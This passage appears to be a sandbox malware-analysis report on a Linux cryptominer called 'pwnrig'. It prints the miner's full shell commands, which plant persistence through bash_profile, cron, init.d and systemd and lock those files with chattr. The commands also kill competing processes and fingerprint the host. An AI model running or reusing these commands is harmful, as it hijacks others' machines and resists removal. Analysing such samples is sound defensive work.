/etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
- Reads EFI boot settings
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Reads CPU attributes
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
-
-
